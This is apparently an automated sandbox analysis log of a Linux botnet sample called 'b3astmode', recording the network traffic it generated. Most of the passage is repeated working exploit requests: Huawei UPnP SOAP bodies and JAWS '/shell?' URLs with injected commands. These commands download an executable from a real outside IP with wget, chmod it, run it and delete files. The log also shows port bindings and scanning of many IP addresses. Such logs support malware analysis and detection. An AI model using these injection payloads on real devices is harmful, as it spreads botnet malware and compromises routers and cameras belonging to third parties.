              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: /tmp/b3astmode.sh4.elf (PID: 6259)Socket: 127.0.0.1:61341Jump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)Socket: 0.0.0.0:23Jump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)Socket: 0.0.0.0:0Jump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)Socket: 0.0.0.0:80Jump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)Socket: 0.0.0.0:81Jump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)Socket: 0.0.0.0:8443Jump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6263)Socket: 0.0.0.0:9009Jump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)Socket: 0.0.0.0:23Jump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)Socket: 0.0.0.0:0Jump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)Socket: 0.0.0.0:80Jump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)Socket: 0.0.0.0:81Jump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)Socket: 0.0.0.0:8443Jump to behavior
              Source: /tmp/b3astmode.sh4.elf (PID: 6272)Socket: 0.0.0.0:9009Jump to behavior
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.168.143
              Source: unknownTCP traffic detected without corresponding DNS query: 186.19.125.38
              Source: unknownTCP traffic detected without corresponding DNS query: 186.172.193.38
              Source: unknownTCP traffic detected without corresponding DNS query: 186.76.46.114
              Source: unknownTCP traffic detected without corresponding DNS query: 186.116.75.25
              Source: unknownTCP traffic detected without corresponding DNS query: 186.51.253.131
              Source: unknownTCP traffic detected without corresponding DNS query: 186.64.147.242
              Source: unknownTCP traffic detected without corresponding DNS query: 186.68.124.152
              Source: unknownTCP traffic detected without corresponding DNS query: 186.151.208.186
              Source: unknownTCP traffic detected without corresponding DNS query: 186.100.204.184
              Source: unknownTCP traffic detected without corresponding DNS query: 186.16.201.57
              Source: unknownTCP traffic detected without corresponding DNS query: 186.250.37.101
              Source: unknownTCP traffic detected without corresponding DNS query: 186.148.129.239
              Source: unknownTCP traffic detected without corresponding DNS query: 186.209.236.173
              Source: unknownTCP traffic detected without corresponding DNS query: 186.239.241.54
              Source: unknownTCP traffic detected without corresponding DNS query: 186.116.36.164
              Source: unknownTCP traffic detected without corresponding DNS query: 186.212.169.127
              Source: unknownTCP traffic detected without corresponding DNS query: 186.23.177.218
              Source: unknownTCP traffic detected without corresponding DNS query: 186.126.79.96
              Source: unknownTCP traffic detected without corresponding DNS query: 186.154.24.140
              Source: unknownTCP traffic detected without corresponding DNS query: 186.177.11.22
              Source: unknownTCP traffic detected without corresponding DNS query: 186.214.126.198
              Source: unknownTCP traffic detected without corresponding DNS query: 186.214.97.207
              Source: unknownTCP traffic detected without corresponding DNS query: 186.14.241.163
              Source: unknownTCP traffic detected without corresponding DNS query: 186.206.34.171
              Source: unknownTCP traffic detected without corresponding DNS query: 186.209.201.112
              Source: unknownTCP traffic detected without corresponding DNS query: 186.40.12.25
              Source: unknownTCP traffic detected without corresponding DNS query: 186.56.186.99
              Source: unknownTCP traffic detected without corresponding DNS query: 186.138.22.178
              Source: unknownTCP traffic detected without corresponding DNS query: 186.199.176.68
              Source: unknownTCP traffic detected without corresponding DNS query: 186.18.52.147
              Source: unknownTCP traffic detected without corresponding DNS query: 186.247.235.75
              Source: unknownTCP traffic detected without corresponding DNS query: 186.174.90.91
              Source: unknownTCP traffic detected without corresponding DNS query: 186.251.247.245
              Source: unknownTCP traffic detected without corresponding DNS query: 186.115.54.95
              Source: unknownTCP traffic detected without corresponding DNS query: 186.83.158.107
              Source: unknownTCP traffic detected without corresponding DNS query: 186.87.100.227
              Source: unknownTCP traffic detected without corresponding DNS query: 186.72.163.148
              Source: unknownTCP traffic detected without corresponding DNS query: 186.130.191.97
              Source: unknownTCP traffic detected without corresponding DNS query: 186.67.100.18
              Source: unknownTCP traffic detected without corresponding DNS query: 186.82.230.250
              Source: unknownTCP traffic detected without corresponding DNS query: 186.200.40.215
              Source: unknownTCP traffic detected without corresponding DNS query: 186.9.133.190
              Source: unknownTCP traffic detected without corresponding DNS query: 186.3.132.247
              Source: unknownTCP traffic detected without corresponding DNS query: 186.65.87.241
              Source: unknownTCP traffic detected without corresponding DNS query: 186.113.18.129
              Source: unknownTCP traffic detected without corresponding DNS query: 186.252.6.208
              Source: unknownTCP traffic detected without corresponding DNS query: 186.237.104.105
              Source: unknownTCP traffic detected without corresponding DNS query: 186.177.190.183
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
